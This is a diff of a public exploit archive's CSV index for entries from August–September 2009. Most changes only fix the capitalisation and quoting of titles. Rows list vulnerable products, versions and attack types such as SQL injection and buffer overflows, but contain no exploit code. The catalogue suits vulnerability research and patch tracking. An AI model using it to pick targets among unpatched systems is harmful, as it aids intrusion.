(forum.php qc) SQL Injection",2009-08-01,rEcruit,php,webapps,0 9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusion",2009-08-01,NoGe,php,webapps,0 9323,platforms/multiple/dos/9323.txt,"VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC)",2009-08-01,"Tadas Vilkeliskis",multiple,dos,0 -9324,platforms/php/webapps/9324.txt,"Joomla Component com_jfusion - (Itemid) Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0 +9324,platforms/php/webapps/9324.txt,"Joomla Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0 9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0 @@ -8815,9 +8816,9 @@ id,file,description,date,author,platform,type,port 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0 9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-03,"599eme Man",php,webapps,0 -9343,platforms/windows/local/9343.pl,"MediaCoder 0.6.2.4275 - '.lst' Stack Buffer Overflow",2009-08-03,SkuLL-HackeR,windows,local,0 +9343,platforms/windows/local/9343.pl,"Mediacoder 0.6.2.4275 - '.lst' Stack Buffer Overflow",2009-08-03,SkuLL-HackeR,windows,local,0 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0 -9345,platforms/windows/dos/9345.pl,"RadASM 2.2.1.5 - (.mnu) Local Format String (PoC)",2009-08-03,SkuLL-HackeR,windows,dos,0 +9345,platforms/windows/dos/9345.pl,"RadASM 2.2.1.5 - '.mnu' Local Format String (PoC)",2009-08-03,SkuLL-HackeR,windows,dos,0 9346,platforms/windows/local/9346.pl,"Blaze HDTV Player 6.0 - '.plf' Local Buffer Overflow (SEH)",2009-08-03,hack4love,windows,local,0 9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - (mod.php module) Local File Inclusion",2009-08-03,Qabandi,php,webapps,0 9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 @@ -8826,14 +8827,14 @@ id,file,description,date,author,platform,type,port 9351,platforms/php/webapps/9351.txt,"Payment Processor Script - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0 9352,platforms/linux/local/9352.c,"Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0 -9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - '.lst' Universal Buffer Overflow (SEH)",2009-08-04,germaya_x,windows,local,0 +9354,platforms/windows/local/9354.pl,"Mediacoder 0.7.1.4486 - '.lst' Universal Buffer Overflow (SEH)",2009-08-04,germaya_x,windows,local,0 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-04,PLATEN,php,webapps,0 -9357,platforms/cgi/webapps/9357.txt,"Perl$hop e-commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 -9358,platforms/php/webapps/9358.txt,"In-Portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 +9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 +9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 9359,platforms/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Buffer Overflow (PoC)",2009-08-04,hack4love,windows,dos,0 9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow Exploit (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0 -9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor - (.mnu) Stack Overflow (PoC)",2009-08-04,"Pankaj Kohli",windows,dos,0 +9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor - '.mnu' Stack Overflow (PoC)",2009-08-04,"Pankaj Kohli",windows,dos,0 9362,platforms/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 - Simple HTML Remote Crash (PoC)",2009-08-05,schnuddelbuddel,windows,dos,0 9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0 9364,platforms/windows/local/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,windows,local,0 @@ -8850,7 +8851,7 @@ id,file,description,date,author,platform,type,port 9376,platforms/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - (M3U/ASX/WAX/WVX) Local Crash (PoC)",2009-09-10,Dr_IDE,windows,dos,0 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow Exploit (SEH)",2009-08-06,hack4love,windows,local,0 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 -9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - '.m3u / '.M3L' Local Stack Overflow (SEH)",2009-08-06,germaya_x,windows,local,0 +9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' Local Stack Overflow (SEH)",2009-08-06,germaya_x,windows,local,0 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 9381,platforms/windows/dos/9381.py,"Groovy Media Player 1.2.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-06,"opt!x hacker",windows,dos,0 9382,platforms/windows/dos/9382.txt,"ImTOO MPEG Encoder 3.1.53 - '.cue' / '.m3u' Local Buffer Overflow (PoC)",2009-08-06,"opt!x hacker",windows,dos,0 @@ -8870,14 +8871,14 @@ id,file,description,date,author,platform,type,port 9398,platforms/php/webapps/9398.php,"Joomla Component com_pms 2.0.4 - (Ignore-List) SQL Injection",2009-08-07,M4dhead,php,webapps,0 9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - (File Disclosure / Insecure Cookie Handling) Multiple Vulnerabilities",2009-08-07,ZoRLu,php,webapps,0 -9401,platforms/windows/dos/9401.py,"Spiceworks 3.6 - Accept Parameter Overflow Crash Exploit",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 +9401,platforms/windows/dos/9401.py,"SpiceWorks 3.6 - Accept Parameter Overflow Crash Exploit",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0 9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - (page.php id) SQL Injection",2009-08-10,Ins3t,php,webapps,0 9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0 9408,platforms/php/webapps/9408.php,"Joomla Component Kunena Forums (com_kunena) - Blind SQL Injection",2009-08-10,"ilker Kandemir",php,webapps,0 -9409,platforms/windows/local/9409.pl,"MediaCoder 0.7.1.4490 - '.lst' / '.m3u' Universal Buffer Overflow Exploit (SEH)",2009-08-10,hack4love,windows,local,0 -9410,platforms/php/webapps/9410.txt,"Wordpress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié ",php,webapps,0 +9409,platforms/windows/local/9409.pl,"Mediacoder 0.7.1.4490 - '.lst' / '.m3u' Universal Buffer Overflow Exploit (SEH)",2009-08-10,hack4love,windows,local,0 +9410,platforms/php/webapps/9410.txt,"WordPress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié ",php,webapps,0 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow (PoC)",2009-08-11,"fl0 fl0w",windows,dos,0 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (1)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps,0 @@ -8886,17 +8887,17 @@ id,file,description,date,author,platform,type,port 9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b - (Authentication Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps,0 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 -9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 - (gallery.php) Arbitrary Delete/Edit Category",2009-08-12,"ilker Kandemir",php,webapps,0 +9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 - 'gallery.php' Arbitrary Delete/Edit Category",2009-08-12,"ilker Kandemir",php,webapps,0 9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (1)",2009-08-12,hkm,hardware,remote,0 9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash Exploit",2009-08-12,murderkey,windows,dos,0 9424,platforms/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injections",2009-08-12,"Sense of Security",php,webapps,0 -9425,platforms/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution Exploit",2009-08-12,IHTeam,php,webapps,0 +9425,platforms/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution",2009-08-12,IHTeam,php,webapps,0 9426,platforms/windows/local/9426.java,"FTPShell Client 4.1 RC2 - Name Session Stack Overflow",2009-08-13,zec,windows,local,0 9427,platforms/windows/dos/9427.py,"VLC Media Player 1.0.0/1.0.1 - smb:// URI Handling Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0 9428,platforms/windows/local/9428.pl,"pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer Exploit (SEH)",2009-08-13,hack4love,windows,local,0 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0 9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 -9431,platforms/php/webapps/9431.txt,"Wordpress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 +9431,platforms/php/webapps/9431.txt,"WordPress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Arbitrary File Upload",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 @@ -8907,7 +8908,7 @@ id,file,description,date,author,platform,type,port 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",linux,dos,0 -9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Directory Traversal (Post-Authenticated)",2009-08-18,DSecRG,windows,remote,0 +9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal",2009-08-18,DSecRG,windows,remote,0 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion",2009-08-18,jetli007,php,webapps,0 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 @@ -8915,14 +8916,14 @@ id,file,description,date,author,platform,type,port 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client - tgbvpn.sys Local Denial of Service",2009-08-18,Evilcry,windows,dos,0 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 -9451,platforms/php/webapps/9451.txt,"Dreampics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 +9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos,0 -9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 +9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - (JavaScript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin User",2009-08-18,SuNHouSe2,hardware,remote,0 -9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - (.mp3) Local Buffer Overflow (PoC)",2009-08-18,hack4love,windows,dos,0 -9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 +9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,hack4love,windows,dos,0 +9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - '.xpl' Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,"cr4wl3r ",php,webapps,0 9461,platforms/php/webapps/9461.txt,"E CMS 1.0 - (index.php s) SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 @@ -8931,9 +8932,9 @@ id,file,description,date,author,platform,type,port 9464,platforms/php/webapps/9464.txt,"Fotoshow PRO - (category) SQL Injection",2009-08-18,darkmasking,php,webapps,0 9465,platforms/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,php,webapps,0 9466,platforms/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,windows,local,0 -9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - (.mp3) Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0 +9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0 9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow Exploit",2009-08-18,Wraith,windows,remote,69 -9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",php,webapps,0 +9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in Slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",php,webapps,0 9470,platforms/php/webapps/9470.txt,"PHP Email Manager - 'remove.php ID' SQL Injection",2009-08-18,MuShTaQ,php,webapps,0 9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0 9472,platforms/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,php,webapps,0 @@ -8961,17 +8962,17 @@ id,file,description,date,author,platform,type,port 9494,platforms/php/webapps/9494.txt,"humanCMS - (Authentication Bypass) SQL Injection",2009-08-24,next,php,webapps,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - '.wav' Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 9496,platforms/windows/dos/9496.txt,"War-FTPD 1.65 - (MKD/CD Requests) Denial of Service",2009-08-24,"opt!x hacker",windows,dos,0 -9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - (itechd.php productid) Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0 -9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclsoure",2009-08-24,"Jean Trolleur",hardware,remote,0 +9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - (itechd.php ProductID) Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0 +9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",hardware,remote,0 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0 9500,platforms/windows/remote/9500.cpp,"NaviCopa Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,windows,remote,0 -9501,platforms/windows/local/9501.py,"Audacity 1.2 - (.gro) Universal Buffer Overflow Exploit (egg hunter)",2009-08-24,mr_me,windows,local,0 +9501,platforms/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow Exploit (egg hunter)",2009-08-24,mr_me,windows,local,0 9502,platforms/php/webapps/9502.txt,"Joomla Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0 9504,platforms/php/webapps/9504.txt,"Joomla Component com_jtips 1.0.x - (season) Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 9505,platforms/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0 -9506,platforms/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 - (.fft) Crash (PoC)",2009-08-24,the_Edit0r,windows,dos,0 -9507,platforms/windows/dos/9507.pl,"AiO (All into One) Flash Mixer 3 - (.afp) Crash (PoC)",2009-08-24,the_Edit0r,windows,dos,0 +9506,platforms/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 - '.fft' Crash (PoC)",2009-08-24,the_Edit0r,windows,dos,0 +9507,platforms/windows/dos/9507.pl,"AiO (All into One) Flash Mixer 3 - '.afp' Crash (PoC)",2009-08-24,the_Edit0r,windows,dos,0 9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 - (welcome message) Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,windows,remote,0 9509,platforms/windows/local/9509.pl,"Media Jukebox 8 - '.m3u' Universal Local Buffer Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 - 'sid' SQL Injection",2009-08-25,v3n0m,php,webapps,0 @@ -8981,7 +8982,7 @@ id,file,description,date,author,platform,type,port 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre - Multiple Models Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 -9517,platforms/windows/dos/9517.txt,"Lotus note connector for Blackberry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 +9517,platforms/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9520,platforms/multiple/local/9520.txt,"HyperVM - File Permissions Local",2009-08-25,"Xia Shing Zee",multiple,local,0 @@ -8990,10 +8991,10 @@ id,file,description,date,author,platform,type,port 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0 9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 -9527,platforms/php/webapps/9527.txt,"Simple CMS FrameWork 1.0 - (page) SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 +9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - (page) SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 9528,platforms/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 - Remote Denial of Service",2009-08-26,"ThE g0bL!N",windows,dos,0 9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 -9530,platforms/php/webapps/9530.txt,"open auto classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 +9530,platforms/php/webapps/9530.txt,"open auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - (list.php string) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9532,platforms/php/webapps/9532.txt,"allomani 2007 - (cat) SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 9533,platforms/php/webapps/9533.txt,"PHPSANE 0.5.0 - (save.php) Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0 @@ -9002,7 +9003,7 @@ id,file,description,date,author,platform,type,port 9536,platforms/windows/local/9536.py,"PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)",2009-08-28,mr_me,windows,local,0 9537,platforms/windows/dos/9537.htm,"Kaspersky 2010 - Remote Memory Corruption / Denial of Service (PoC)",2009-08-28,"Prakhar Prasad",windows,dos,0 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System - 'category.php' SQL Injection",2009-08-28,Mr.SQL,php,webapps,0 -9539,platforms/windows/dos/9539.py,"uTorrent 1.8.3 - (Build 15772) Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,windows,dos,0 +9539,platforms/windows/dos/9539.py,"uTorrent 1.8.3 (Build 15772) - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,windows,dos,0 9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0 9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow (Windows 2000)",2009-08-31,kingcope,windows,remote,21 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0 @@ -9019,7 +9020,7 @@ id,file,description,date,author,platform,type,port 9553,platforms/php/webapps/9553.txt,"BandCMS 0.10 - news.php Multiple SQL Injection",2009-08-31,Affix,php,webapps,0 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit",2009-08-31,TheLeader,windows,dos,0 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps,0 -9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0 +9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps,0 9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 (Windows 2000 SP4) - FTP Server Remote Stack Overflow",2009-09-01,muts,windows,remote,21 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow Exploits",2009-09-01,hack4love,windows,local,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,windows,dos,0 @@ -9029,7 +9030,7 @@ id,file,description,date,author,platform,type,port 9565,platforms/php/webapps/9565.txt,"Xstate Real Estate 1.0 - (Blind SQL Injection / Cross-Site Scripting) Multiples Vulnerabilities",2009-09-01,Moudi,php,webapps,0 9566,platforms/php/webapps/9566.txt,"Kingcms 0.6.0 - (menu.php) Remote File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 9567,platforms/windows/local/9567.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (1)",2009-09-01,"ThE g0bL!N",windows,local,0 -9568,platforms/windows/local/9568.py,"akPlayer 1.9.0 - (.plt) Universal Buffer Overflow (SEH)",2009-09-01,TiGeR-Dz,windows,local,0 +9568,platforms/windows/local/9568.py,"akPlayer 1.9.0 - '.plt' Universal Buffer Overflow (SEH)",2009-09-01,TiGeR-Dz,windows,local,0 9569,platforms/php/webapps/9569.txt,"phpBB3 - addon prime_quick_style GetAdmin",2009-09-01,-SmoG-,php,webapps,0 9570,platforms/php/webapps/9570.txt,"Ve-EDIT 0.1.4 - (debug_PHP.php) Local File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 9571,platforms/php/webapps/9571.txt,"Joomla Component com_gameserver 1.0 - 'id' SQL Injection",2009-09-01,v3n0m,php,webapps,0 @@ -9050,12 +9051,12 @@ id,file,description,date,author,platform,type,port 9586,platforms/windows/remote/9586.py,"SIDVault 2.0e - Windows Remote Buffer Overflow",2009-09-03,blake,windows,remote,389 9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0 9588,platforms/php/webapps/9588.txt,"Mambo Component com_zoom - 'catid' Blind SQL Injection",2009-09-04,boom3rang,php,webapps,0 